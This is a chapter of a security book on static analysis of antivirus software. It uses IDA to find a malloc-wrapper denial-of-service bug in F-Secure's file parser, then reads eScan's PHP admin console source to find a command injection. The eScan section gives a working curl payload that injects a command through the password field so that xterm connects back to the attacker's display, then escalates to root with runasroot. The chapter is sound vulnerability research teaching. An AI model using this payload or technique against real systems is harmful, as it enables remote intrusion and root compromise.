Static Analysis - Analysis and Exploitation - The Antivirus Hacker's Handbook (2015)

The Antivirus Hacker's Handbook (2015)

Part III. Analysis and Exploitation

In This Part

1. Chapter 12: Static Analysis

2. Chapter 13: Dynamic Analysis

3. Chapter 14: Local Exploitation

4. Chapter 15: Remote Exploitation

Chapter 12. Static Analysis

Static analysis is a research method used to analyze software without actually executing it. This method involves extracting all the information relevant to the analysis (such as finding bugs) using static means.

Analyzing code with static analysis is often done by reading its source code or the corresponding assembly in the case of closed-source products. Although this is, naturally, the most time-consuming technique used to analyze a piece of software, it offers the best results overall, because it forces the analyst to understand how the software works at the lower levels.

This chapter discusses how you can use static analysis techniques to discover vulnerabilities in antivirus software. It focuses on the de facto tool for static analysis, IDA.

Performing a Manual Binary Audit

Manual binary auditing is the process of manually analyzing the assembly code of the relevant binaries from a software product in order to extract artifacts from it. As an example, this chapter shows you how to manually audit an old version of F-Secure Anti-Virus for Linux with the aim of discovering some vulnerability that you could exploit remotely, such as a bug in the file format parsers. Fortunately for reverse-engineers, this antivirus product comes with symbolic information, which makes the static analysis audit easier.

When you have symbolic information either because the program database (PDB) files were present for a Windows application or because the DWARF debugging information was embedded in Unix applications, you can simply skip analyzing all those exported functions. This allows you to avoid reverse-engineering them and losing many precious work hours. If there is not enough symbolic information, especially about standard library functions (those found in the C runtime [CRT] library or LIBC, such as malloc, strlen,memcpy, and so on), then you can rely on IDA's “Fast Library Identification and Recognition Technology” (also known as FLIRT) to discover the function names for you. Often, even without having any symbols, it is possible to deduce what a certain function does by formulating a quick understanding of its general algorithms and purpose. As an example of the latter, I managed to avoid reverse-engineering a set of functions because I could directly identify them as being related to the RSA algorithm.

File Format Parsers

For experimentation and demonstration purposes, this chapter uses the antivirus product F-Secure Anti-Virus for Linux. After installing this product, you will have a few folders in the /opt/f-secure directory:

$ ls -l /opt/f-secure/

total 12

drwxrwxr-x 5 root root 4096 abr 19 2014 fsaua

drwxr-xr-x 3 root root 4096 abr 19 2014 fsav

drwxrwxr-x 10 root root 4096 abr 19 2014 fssp

From this directory listing, you might guess that the prefix fs means F-Secure and the prefix av means antivirus. If you take a look inside the second directory, you will discover that it contains almost exclusively symbolic links:

$ ls -l /opt/f-secure/fsav/bin/

total 4

lrwxrwxrwx 1 root root 48 abr 19 2014 clstate_generator ->

/opt/f-secure/fsav/../fssp/bin/clstate_generator

lrwxrwxrwx 1 root root 45 abr 19 2014 clstate_update ->

/opt/f-secure/fsav/../fssp/bin/clstate_update

lrwxrwxrwx 1 root root 49 abr 19 2014 clstate_updated.rc ->

/opt/f-secure/fsav/../fssp/bin/clstate_updated.rc

lrwxrwxrwx 1 root root 39 abr 19 2014 dbupdate ->

/opt/f-secure/fsav/../fssp/bin/dbupdate

lrwxrwxrwx 1 root root 44 abr 19 2014 dbupdate_lite ->

/opt/f-secure/fsav/../fssp/bin/dbupdate_lite

lrwxrwxrwx 1 root root 35 abr 19 2014 fsav ->

/opt/f-secure/fsav/../fssp/bin/fsav

lrwxrwxrwx 1 root root 37 abr 19 2014 fsavd ->

/opt/f-secure/fsav/../fssp/sbin/fsavd

lrwxrwxrwx 1 root root 37 abr 19 2014 fsdiag ->

/opt/f-secure/fsav/../fssp/bin/fsdiag

lrwxrwxrwx 1 root root 42 abr 19 2014 licensetool ->

/opt/f-secure/fsav/../fssp/bin/licensetool

-rwxr--r-- 1 root root 291 abr 19 2014 uninstall-fsav

Because of where the symbolic links point, it seems that the interesting directory is fssp:

$ ls -l /opt/f-secure/fssp/

total 32

drwxrwxr-x 2 root root 4096 abr 19 2014 bin

drwxrwxr-x 2 root root 4096 ene 30 2014 databases

drwxrwxr-x 2 root root 4096 abr 19 2014 etc

drwxrwxr-x 3 root root 4096 abr 19 2014 lib

drwxrwxr-x 2 root root 4096 abr 19 2014 libexec

drwxrwxr-x 2 root root 4096 abr 19 2014 man

drwxrwxr-x 2 root root 4096 abr 19 2014 modules

drwxrwxr-x 2 root root 4096 abr 19 2014 sbin

Great! This directory includes the databases, the programs' directories (bin and sbin), some library directories (lib and libexec), the man pages, and the modules directory. Take a look at the lib directory and see if you can discover a library or set of libraries with the code-handling file formats:

$ ls -l /opt/f-secure/fssp/lib

total 3112

-rw-r--r-- 1 root root 2475 nov 19 2013 fsavdsimple.pm

-rwxr-xr-x 1 root root 252111 nov 19 2013 fsavdsimple.so

-rw-r--r-- 1 root root 32494 ene 30 2014 fssp-common

-rwxr-xr-x 1 root root 244324 ene 30 2014 libdaas2.so

-rwxr-xr-x 1 root root 123748 ene 30 2014 libdaas2tool.so

-rwxr-xr-x 1 root root 1606472 ene 30 2014 libfm.so

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so ->

libfsavd.so.7.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.4 ->

libfsavd.so.4.0.0

-rwxr-xr-x 1 root root 66680 ene 30 2014 libfsavd.so.4.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.5 ->

libfsavd.so.5.0.0

-rwxr-xr-x 1 root root 70744 ene 30 2014 libfsavd.so.5.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.6 ->

libfsavd.so.6.0.0

-rwxr-xr-x 1 root root 74872 ene 30 2014 libfsavd.so.6.0.0

lrwxrwxrwx 1 root root 17 abr 19 2014 libfsavd.so.7 ->

libfsavd.so.7.0.0

-rw-r--r-- 1 root root 79040 nov 19 2013 libfsavd.so.7.0.0

lrwxrwxrwx 1 root root 13 abr 19 2014 libfsclm.so ->

libfsclm.so.2

lrwxrwxrwx 1 root root 18 abr 19 2014 libfsclm.so.2 ->

libfsclm.so.2.2312

-rwxr-xr-x 1 root root 309724 may 21 2013 libfsclm.so.2.2312

lrwxrwxrwx 1 root root 20 abr 19 2014 libfsmgmt.2.so ->

libmgmtfile.2.0.0.so

lrwxrwxrwx 1 root root 17 abr 19 2014 libfssysutil.so ->

libfssysutil.so.0

-rwxr-xr-x 1 root root 27272 ene 30 2014 libfssysutil.so.0

-rwxr-xr-x 1 root root 44532 ene 30 2014 libkeycheck.so

-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfile.2.0.0.so

lrwxrwxrwx 1 root root 20 abr 19 2014 libmgmtfile.2.so ->

libmgmtfile.2.0.0.so

-rwxr-xr-x 1 root root 56488 sep 5 2013 libmgmtfsma.2.0.0.so

-rw-rw-r-- 1 root root 2386 ene 23 2014 libosid

-rw-r--r-- 1 root root 96312 nov 26 2013 libsubstatus.1.1.0.so

lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.1.so ->

libsubstatus.1.1.0.so

lrwxrwxrwx 1 root root 21 abr 19 2014 libsubstatus.so ->

libsubstatus.1.1.0.so

-rw-rw-r-- 1 root root 2696 ene 23 2014 safe_rm

drwxrwxr-x 2 root root 4096 abr 19 2014 x86_64

There are many libraries, but one of them should catch your attention because it is bigger than the other ones: libfm.so. Run the command nm -B to determine whether you have an interesting symbol:

$ LANG=C nm -B /opt/f-secure/fssp/lib/libfm.so

nm: /opt/f-secure/fssp/lib/libfm.so: no symbols

It seems there is no symbol. However, you may have another interesting source of symbolic information: the list of exported symbols. This time, run the readelf -Ws command:

$ LANG=C readelf -Ws libfm.so | more

Symbol table '.dynsym' contains 3820 entries:

Num: Value Size Type Bind Vis Ndx Name

0: 00000000 0 NOTYPE LOCAL DEFAULT UND

1: 00042354 0 SECTION LOCAL DEFAULT 8

2: 0004a0ac 0 SECTION LOCAL DEFAULT 10

3: 001331f0 0 SECTION LOCAL DEFAULT 11

4: 00133220 0 SECTION LOCAL DEFAULT 12

5: 00139820 0 SECTION LOCAL DEFAULT 13

6: 00139828 0 SECTION LOCAL DEFAULT 14

7: 00161aa4 0 SECTION LOCAL DEFAULT 15

8: 00169098 0 SECTION LOCAL DEFAULT 16

9: 001690a0 0 SECTION LOCAL DEFAULT 17

10: 001690a8 0 SECTION LOCAL DEFAULT 18

11: 001690c0 0 SECTION LOCAL DEFAULT 19

12: 0016c280 0 SECTION LOCAL DEFAULT 23

13: 00187120 0 SECTION LOCAL DEFAULT 24

14: 000d29dc 364 FUNC GLOBAL DEFAULT 10

_ZN21CMfcMultipartBodyPartD2Ev

15: 0006e034 415 FUNC GLOBAL DEFAULT 10

_Z20LZ_CloseArchivedFileP11LZFileDataIP14LZArchiveEntry

16: 000bd8b0 92 FUNC GLOBAL DEFAULT 10

_ZNK16CMfcBasicMessage7SubtypeEv

17: 00000000 130 FUNC GLOBAL DEFAULT UND

__cxa_guard_acquire@CXXABI_1.3 (2)

18: 00000000 136 FUNC GLOBAL DEFAULT UND

__cxa_end_catch@CXXABI_1.3 (2)

19: 0006f21c 647 FUNC GLOBAL DEFAULT 10

_Z13GZIPListFilesP11LZFileDataIP7GZ_DATA

20: 000e42c6 399 FUNC GLOBAL DEFAULT 10

_ZNK12CMfcDateTime6_ParseEb

21: 000e0ce8 80 FUNC GLOBAL DEFAULT 10 _ZN10FMapiTableD2Ev

22: 000a8a6c 163 FUNC GLOBAL DEFAULT 10

_ZN13SISUnArchiver12uninitializeEv

(…)

Wow! This reveals a lot of symbols (3,820 entries according to readelf). The symbol names are mangled, but IDA can show them unmangled. Having such a large number of symbols will definitely make it easier to reverse-engineer this library. To begin, filter the results to determine whether this library is the one responsible for parsing file formats, unpacking compressed files, or performing other relevant tasks:

$ LANG=C readelf -Ws libfm.so | egrep -i "(packer|compress|gzip|bz2)"

| more

19: 0006f21c 647 FUNC GLOBAL DEFAULT 10

_Z13GZIPListFilesP11LZFileDataIP7GZ_DATA

41: 000af770 47 FUNC GLOBAL DEFAULT 10

_ZN17LzmaPackerDecoderD1Ev

47: 000ae0c8 7 FUNC WEAK DEFAULT 10

_ZN20HydraUnpackerContext13confirmActionEjPc

55: 000a2ae8 169 FUNC GLOBAL DEFAULT 10

_ZN29FmPackerManagerImplementation18packerFindNextFileEiP17FMF

INDDATA_struct

59: 000b1b04 7 FUNC WEAK DEFAULT 10

_ZN19FmUnpackerInstaller28packerQueryArchiveMagicBytesERSt6vectorI

13ArchMagicByteSaIS1_EEm

75: 000adff4 11 FUNC WEAK DEFAULT 10

_ZNK20HydraUnpackerContext12FmFileReader13getFileStatusEv

78: 000a5724 54 FUNC GLOBAL DEFAULT 10 _ZN14FmUnpackerCPIOD0Ev

83: 00134878 15 OBJECT WEAK DEFAULT 12 _ZTS12FmUnpacker7z

84: 000a15d8 54 FUNC GLOBAL DEFAULT 10 packerGetFileStat

94: 000adba4 7 FUNC GLOBAL DEFAULT 10

_ZN14FmUnpackerSisX15packerWriteFileEPvS0_lPKvmPm

122: 000a1948 7 FUNC GLOBAL DEFAULT 10

(…)

Bingo! It seems that the code for compressed file formats, packers, and so on is implemented in this library. Launch IDA and open this library. After the initial auto-analysis, the Functions window is populated with the unmangled names, as shown in Figure 12.1.

Screenshot of the “library libfm.so” in IDA window. Function names are listed in the left pane. IDA View-A tab is displayed on the right pane presenting codes.

Figure 12.1 The library libfm.so opened in IDA Pro

As you can see in the list of functions on the left side, a lot of functions have useful names, but what is the next step? Typically, when I begin a new project with the aim of discovering vulnerabilities, I start by finding the interesting memory management functions of the application (malloc, free, and similar functions) and start digging from that point. On the left side, in the Functions window, click the Function Name header to sort the function listings by name, and then search for the first match for a function containing the word malloc. In this example, two listings have the name FMAlloc(uint). One is the thunk function and the other is the actual function implementation. The function implementation is referenced by the thunk function and the Global Object Table (GOT), while the thunkfunction is referenced by the rest of the program. Click the X key on the thunk function to show its cross references, as shown in Figure 12.2.

Screenshot of the “xrefs to FMalloc (uint)” dialog with a list of code references. Code address “D…p FMSzAlloc:: Alloc(uint)+72” and text “call _Z7FMAllocj:FMAlloc(uint)” are selected.

Figure 12.2 Find the code references to FMAlloc(uint).

You have a total of 248 code references to this function, which is effectively a malloc wrapper function. It is now time to analyze the function FMAlloc to see how it works.

By looking at FMAlloc's disassembly, you can see that it starts by checking to see whether some global pointer is not NULL. This function is used to get a pointer to the LIBC's function malloc:

.text:0004D76C ; _DWORD __cdecl FMAlloc(size_t n)

.text:0004D76C public _Z7FMAllocj

.text:0004D76C _Z7FMAllocjproc near ; CODE XREF: FMAlloc(uint)j

.text:0004D76C n = dword ptr 8

.text:0004D76C

.text:0004D76C push ebp

.text:0004D76D mov ebp, esp

.text:0004D76F push edi

.text:0004D770 push esi

.text:0004D771 push ebx

.text:0004D772 sub esp, 0Ch

.text:0004D775 call $+5

.text:0004D77A pop ebx

.text:0004D77B add ebx, 11CBAEh

.text:0004D781 mov eax, ds:(g_fileio_ptr - 16A328h)[ebx]

; My guess is that it's returning a pointer to "malloc".

.text:0004D787 mov eax, [eax+24h]

; Is the pointer to malloc NULL?

.text:0004D78A test eax, eax

.text:0004D78C mov edi, [ebp+n]

.text:0004D78F jz short loc_4D7B0

If the function pointer returned in 0x4d787 is not NULL, it continues normally with the next instruction; otherwise, the branch to 0x4D7B0 is taken. If you follow this jump, you discover the following code:

.text:0004D7B0 loc_4D7B0: ; CODE XREF: FMAlloc(uint)+23j

.text:0004D7B0 sub esp, 0Ch

.text:0004D7B3 push edi ; size

.text:0004D7B4 call _malloc

.text:0004D7B9 add esp, 0Ch

.text:0004D7BC push edi ; n

.text:0004D7BD push 0 ; c

.text:0004D7BF push eax ; s

.text:0004D7C0 mov esi, eax

.text:0004D7C2 call _memset

.text:0004D7C7 lea esp, [ebp-0Ch]

.text:0004D7CA pop ebx

.text:0004D7CB mov eax, esi

.text:0004D7CD pop esi

.text:0004D7CE pop edi

.text:0004D7CF leave

.text:0004D7D0 retn

.text:0004D7D0 _Z7FMAllocj endp

This part of the code allocates memory as much as specified by the arguments the function receives (the size is stored in the EDI register) at 0x4D7B3. Then, it calls memset over the function pointer returned by malloc to initialize the buffer to 0x00s. There are at least two bugs here. The first one is that there is not a check for invalid allocation sizes given to the malloc function. You can pass -1, which is translated to 0xFFFFFFFF in a 32-bit application or 0xFFFFFFFFFFFFFFFF in a 64-bit application, and it tries to allocate 4GB in 32-bit or 16EiB (exbibytes) in 64-bit platforms. Obviously, it simply fails because that is the maximum virtual memory range that can be addressed. You can also pass zero, which returns a valid pointer, but any attempt to write anything to that allocated memory risks corrupting the heap metadata or other previously allocated memory blocks.

The second bug is even easier to spot: there is no check at all after the malloc call to determine whether it failed. So, if you can pass an invalid size (such as –1), it causes the malloc function to fail (by returning a null pointer). Then, FMAlloc continues by calling memset to clear the newly allocated memory pointer. This entire function call is then equivalent to memset(nullptr, 0x00, size_t(-1)), resulting in an access violation exception or a segfault (segmentation fault).

Okay, so you discovered your first bug in the F-Secure libfm.so library. What is your next step? It is time to discover whether the function FMAlloc is called with unsanitized input that is user controlled. The input can come from reading an input file, while parsing its format, and then some fields are passed to FMAlloc without further sanitation or checks. Typically, a size field in a file format that is read and used to allocate memory using FMAlloc is an interesting target. The function InnoDecoder::IsInnoNew, which is one of the many cross-references to FMAlloc, is an example of that. In this function, there are a few calls to initialize internal structures and to read the DOS header of an InnoSetup-compressed executable, the PE header, and other headers, as well as InnoSetup's own header. After such function calls, you have the following code:

.text:F72E5743 jz short loc_F72E57B1

.text:F72E5745 sub esp, 0Ch

.text:F72E5748 push [ebp+n] ; n

.text:F72E574E call __Z7FMAllocj ; FMAlloc(uint)

.text:F72E5753 add esp, 10h

.text:F72E5756 test eax, eax

.text:F72E5758 mov [ebp+s], eax

.text:F72E575E jz short loc_F72E57B1

.text:F72E5760 push ecx

.text:F72E5761 push [ebp+n] ; n

.text:F72E5767 push 0 ; c

.text:F72E5769 push eax ; s

.text:F72E576A call _memset

.text:F72E576F add esp, 10h

This code calls FMAlloc, passing the argument n. It so happens that n is actually read directly from the file buffer, so by simply setting this 32-bit unsigned value of the corresponding field in the input file to 0xFFFFFFFF (–1), you trigger the bug you just uncovered. To test this bug, you have to create (or download) an InnoSetup and modify the field in question to the value 0xFFFFFFFF. When a vulnerable (old) version of F-Secure Anti-Virus analyzes such a file, it crashes because it attempts to write to a null pointer.

You have just discovered an easy remote denial-of-service (DoS) attack vector in the InnoSetup installer files analyzer code of F-Secure, and that is because of a buggy malloc wrapper function. The InnoDecoder::IsInnoNew function is just one vulnerable function. There were many more, such as LoadNextTarFilesChunk, but according to the vendor they are now all fixed. As an exercise, you can verify whether this is true.

Remote Services

Static analysis can be applied to any other source code listing and not just a disassembler code listing. For example, this section covers a bug in eScan Antivirus for Linux that can be discovered by statically analyzing the PHP source code of the management web application. It took one hour to discover this vulnerability by taking a look at the installed components. eScan Antivirus for Linux consists of the following components:

· A multiple antivirus scanner using the kernels of both Bitdefender and ClamAV

· An HTTP server (powered by Apache)

· A PHP application for management

· A set of other native Executable and Linkable Format (ELF) programs

These components must be installed separately using the appropriate DEB package (for Ubuntu or other Debian-based Linux distributions). The vulnerable package versions of this product are shown here:

· escan-5.5-2.Ubuntu.12.04_x86_64.deb

· mwadmin-5.5-2.Ubuntu.12.04_x86_64.deb

· mwav-5.5-2.Ubuntu.12.04_x86_64.deb

You do not need to install the packages to perform static analysis for the purpose of finding vulnerabilities. You just need to unpack the files and take a look at the PHP sources. However, naturally, to test for possible vulnerabilities, you need to have the product deployed and running, so you should install it anyway.

The command to install the eScan DEB packages in Debian-based Linux distributions is $ dpkg -i *.deb.

After you install the application, a set of directories, applications, and so on are installed in the directory /opt/MicroWorld, as shown here:

$ ls /opt/MicroWorld/

bin etc lib sbin usr var

It is always interesting for local applications to look for SUID/SGID files (see Chapter 10 for more information). However, in the case of this specific application, even when it is remote, you should also check for SUID/SGID files for a reason that will be explained later on. The command you can issue in Linux or Unix to find SUID files is as follows:

$ find . -perm +4000

/opt/MicroWorld/sbin/runasroot

This command reveals that the program runasroot is SUID. According to its name, the purpose of this program is clear: to run as root the commands that are passed to it. However, not all users can run it, only the users root and mwconf (a user created during the installation). The PHP web application, running under the context of the installed web server, runs as this user. This means that if you manage to find a remote code execution bug in the PHP web application, you can simply run commands as root, because the usermwconf is allowed to execute the SUID application runasroot. If you can manage to find such a bug, it would be extremely cool.

Take a look at the PHP application installed in the directory /opt/MicroWorld/var/www/htdocs/index.php:

$ find /opt -name "*.php"

/opt/MicroWorld/var/www/htdocs/index.php

/opt/MicroWorld/var/www/htdocs/preference.php

/opt/MicroWorld/var/www/htdocs/online.php

/opt/MicroWorld/var/www/htdocs/createadmin.php

/opt/MicroWorld/var/www/htdocs/leftmenu.php

/opt/MicroWorld/var/www/htdocs/help_contact.php

/opt/MicroWorld/var/www/htdocs/forgotpassword.php

/opt/MicroWorld/var/www/htdocs/logout.php

/opt/MicroWorld/var/www/htdocs/mwav/index.php

/opt/MicroWorld/var/www/htdocs/mwav/crontab.php

/opt/MicroWorld/var/www/htdocs/mwav/action.php

/opt/MicroWorld/var/www/htdocs/mwav/selections.php

/opt/MicroWorld/var/www/htdocs/mwav/savevals.php

/opt/MicroWorld/var/www/htdocs/mwav/status_Updatelog.php

/opt/MicroWorld/var/www/htdocs/mwav/header.php

/opt/MicroWorld/var/www/htdocs/mwav/readvals.php

/opt/MicroWorld/var/www/htdocs/mwav/manage_admins.php

/opt/MicroWorld/var/www/htdocs/mwav/logout.php

/opt/MicroWorld/var/www/htdocs/mwav/AV_vdefupdates.php

/opt/MicroWorld/var/www/htdocs/mwav/login.php

/opt/MicroWorld/var/www/htdocs/mwav/main.php

/opt/MicroWorld/var/www/htdocs/mwav/crontab_mwav.php

/opt/MicroWorld/var/www/htdocs/mwav/main_functions.php

/opt/MicroWorld/var/www/htdocs/mwav/update.php

/opt/MicroWorld/var/www/htdocs/mwav/status_AVfilterlog.php

/opt/MicroWorld/var/www/htdocs/mwav/topbar.php

/opt/MicroWorld/var/www/htdocs/common_functions.php

/opt/MicroWorld/var/www/htdocs/login.php

(…)

Notice that there are a lot of PHP files. If you open the file index.php (the very first page that is usually served by the web server), you will discover that it is not very exciting. However, inside it, there is a section of code that references the PHP script login.php:

(…)

<form method="post" action="login.php">

<table class="tabledata" width="400" class="center"

cellspacing="5">

(…)

Now open the file and check how it performs authentication. Perhaps you can find some way to bypass it. It starts by checking whether the CGI REQUEST_METHOD used was not the GET method (as opposed to the POST method, for example):

(…)

<?php

include("common_functions.php");

// code for detection of javascript and cookie support in client browser

if(strpos($_SERVER["REQUEST_METHOD"],"GET") !== false )

{

header("Location: index.php");

exit();

}

(…)

Then, a set of checks for actions are performed that are completely irrelevant to your purposes. It is worthwhile noting how $runasroot is referenced:

(…)

$passwdFile="/opt/MicroWorld/etc/passwd";

$product=trim($_POST['product_name']);

$username=trim($_POST['uname']);

$passwd = trim($_POST["pass"]);

$language = $_POST["language"];

$conffile = "/opt/MicroWorld/etc/auth.conf";

$auth_conf = false;

if(file_exists($conffile))

{

Upgrade_Old_Auth_Conf($conffile);

$auth_conf = MW_readConf($conffile, "#", '', '"');

}

else

{

$auth_conf = array();

$auth_conf['auth']['type'] = 0;

exec("$runasroot /bin/touch $conffile");

exec("$runasroot /bin/chown mwconf:mwconf $conffile");

MW_writeConf($auth_conf,$conffile,"",'"');

}

(…)

The PHP script is reading from the arguments sent to the PHP application some interesting fields (uname, short for user name, and pass, short for password), and, more interestingly, it is simply calling exec($runasroot) using some variables. However, the $conffile is hard-coded in the PHP application, and as so you cannot influence it. Can you somehow influence any other exec($runasroot) calls? If you continue to analyze this PHP file, you will discover a suspicious check:

(…)

$retval = check_user($username, "NULL", $passwdFile, "NULL");

list($k,$v)=explode("-",$retval);

if($v != 0 )

{

header("Location: index.php?err_msg=usernotexists");

exit();

}

elseif( strlen($passwd)<5 )

{

header("Location: index.php?err_msg=password_len");

exit();

}

elseif( preg_match("/[|&)(!><\'\"` ]/", $passwd) )

{

header("Location: index.php?err_msg=password_chars");

exit();

}

else

{

$retval=check_user($username,$passwd,$passwdFile,"USERS");

list($k,$v)=explode("-",$retval);

if($v == 0)

{

$retval=check_user($username,$passwd,$passwdFile,$product);

list($k,$v)=explode("-",$retval);

if($v == 0)

(…)

Do you see the preg_match call? It is meant to find any of the following characters and the space character: [!&)(!><'"`. You might guess at the first check that this call filters out typical command injections based on using shell escape characters. However, if that is the case, then it forgot to filter at least one more important character: the semicolon (;). Follow the control flow of this PHP script to see whether the $passwd argument sent from the client is actually used and passed to some kind of operating system command. Eventually, if all the checks are passed, it calls the function check_user. Running a grep search for it, you discover that it is implemented in the PHP script common_functions.php. If you open this file and go to the implementation of the check_user function, you discover the following:

(…)

function check_user($uname, $password, $passfile, $product)

{

// name and path of the binary

$prog = "/opt/MicroWorld/sbin/checkpass";

$runasroot = "/opt/MicroWorld/sbin/runasroot";

unset($output);

unset($ret);

// name and path of the passwd file

$out= exec("$runasroot $prog $uname $password $passfile

$product",$output,$ret);

$val = $output[0]."-".$ret;

return $val;

}(…)

Beautiful! The user-passed password field is concatenated and executed via the PHP function exec(), which allows the use of shell escaping characters; this, in turn, makes it possible to execute any operating system command. However, because you are using the semicolon character, it acts as a command separator; thus, the subsequent command is processed not by the SUID binary runasroot but rather by the shell itself and will be executing the command as the user running the web application mwconf. However, as you previously discovered, the user was also allowed to execute the runasroot SUID executable. As a result, you can inject a command, but, unfortunately, you cannot directly run code as root.

You have one more problem: the space character is filtered out. This means that you cannot construct long commands because spaces are forbidden. Does this mean that you are restricted to running one single command? Not quite, because you can use an old trick: you can run the command xterm, or any other X11 GUI applications telling it to connect back to you. However, because you cannot use spaces, you need to inject various commands, separated with the semicolon character. Also, there is one more detail: before executing the command, the script checks that the given username is valid. This is an unfortunate limitation, as it restricts your exploitation because you need to know at least one valid username. However, suppose you know a valid username (and it is not that difficult to guess in many situations); here is how your first attempt to exploit this bug might look:

$ curl -data \

"product=1&uname=valid@user.com&pass=;DISPLAY=YOURIP:0;xterm;" \

http://target:10080/login.php

When you run this command, the vulnerable machine tries to connect back to the X11 server running on your machine. Then, you can simply issue the following command from xterm to gain root privileges:

$ /opt/MicroWorld/sbin/runasroot bash

And you are done—you are now root in the vulnerable machine! This particular vulnerability was discovered exclusively by using static analysis. It would not have been possible, or at least easy, to discover the vulnerability using only dynamic analysis techniques, as you did not know its inner workings. In any case, different techniques may find different kinds of bugs.

Summary

Static analysis is a research method used to analyze code without actually executing it. Usually, this involves reading the source code of the said software, if it is available, and looking for security lapses that allow an attacker to exploit the software. If a product is closed source, then binary reverse-engineering is the way to go. IDA is the de facto tool for such tasks. With IDA's FLIRT technology, you can save time by avoiding reverse-engineering library functions compiled into the binary because FLIRT identifies them for you, thus leaving you more interesting pieces to reverse-engineer.

Additionally, the chapter presented two hands-on examples showing how to statically analyze source code and the disassembly of a closed-source program using IDA. Through reverse-engineering a bug that can be exploited remotely was uncovered in the file format parser of an old version of F-Secure Anti-Virus for Linux. Similarly, we demonstrated a way to remotely inject commands and, thereafter, escalate privilege in the eScan antivirus for Linux administration console just by reading its PHP source code.

Static analysis has its limitations, especially when it could be very time-consuming to reverse-engineer closed-source programs or when the source code of a software is too big to read and find bugs in. The next chapter will discuss dynamic analysis techniques that begin where static analysis left off, by analyzing the behavior of the program during runtime and finding security bugs.